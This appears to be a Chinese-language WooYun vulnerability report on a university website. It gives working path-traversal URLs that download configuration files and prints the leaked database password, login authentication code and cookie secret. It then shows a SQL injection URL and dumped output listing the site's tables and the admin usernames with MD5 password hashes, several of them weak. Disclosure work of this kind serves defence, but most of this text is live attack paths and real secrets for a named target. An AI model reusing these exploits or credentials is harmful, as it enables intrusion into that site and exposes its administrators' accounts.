WooYun.org

首先是任意文件下载，例如下载网站配置文件
http://skc.xtu.edu.cn/myphp/skc/php/downfile.php?downfile=../../../../e/config/config.php
http://skc.xtu.edu.cn/myphp/skc/php/downfile.php?downfile=../../../../myphp/skc/skc_admin/config_base.php
//数据库配置信息
$ecms_config['db']['usedb']='mysql'; //数据库类型
$ecms_config['db']['dbver']='5.0'; //数据库版本
$ecms_config['db']['dbserver']='localhost'; //数据库登录地址
$ecms_config['db']['dbport']=''; //端口，不填为按默认
$ecms_config['db']['dbusername']='skc2014_cqy'; //数据库用户名
$ecms_config['db']['dbpassword']='TYJQbddT6PxddesWne@'; //数据库密码
$ecms_config['db']['dbname']='skc2014_data'; //数据库名
//后台安全设置
$ecms_config['esafe']['loginauth']='skc2014'; //登录认证码,如果设置登录需要输入此认证码才能通过
$ecms_config['esafe']['ecookiernd']='E85rF4YTN5jJeJMwCiz44Nj68v263H'; //后台登录COOKIE认证码(填写10~50个任意字符，最好多种字符组合)
然后是注入
http://skc.xtu.edu.cn/myphp/skc/php/viewart.php?artID=2581
xtuskc@localhost
[*] information_schema
[*] xtuskc
Database: xtuskc
[14 tables]
+------------------+
| dede_admin |
| dede_aera |
| dede_art |
| dede_arttype |
| dede_channeltype |
| dede_feedback |
| dede_flink |
| dede_flinktype |
| dede_guestbook |
| dede_member |
| dede_membertype |
| dede_partmode |
| dede_spec |
| dede_weburl |
+------------------+
Database: xtuskc
Table: dede_admin
[9 entries]
+----------------------------------+---------+
| pwd | uname |
+----------------------------------+---------+
| e3a59a6e4666d6d1104fe0e0bc1c4028 | admin |
| 7debc8eb445b974a0f6a9d6bdbd9be8d | yuwen |
| 202cb962ac59075b964b07152d234b70 | wxq |
| 523af537946b79c4f8369ed39ba78605 | admin1 |
| 202cb962ac59075b964b07152d234b70 | dongyi |
| b2789415adb1663ba54dd14aaa147b2c | hyp |
| 662948b54d5b7330b7ad1e5cd5d66dcd | <blank> |
| 93628d61e269f816a635d4870183457b | ych |
| 81dc9bdb52d04dc20036dbd8313ed055 | ws |
+----------------------------------+---------+
又来弱口令，后来网站打不开了，可能是维护关机了？所以没有截图。
发现主要是旧版网站存在问题，从而影响到新网站的安全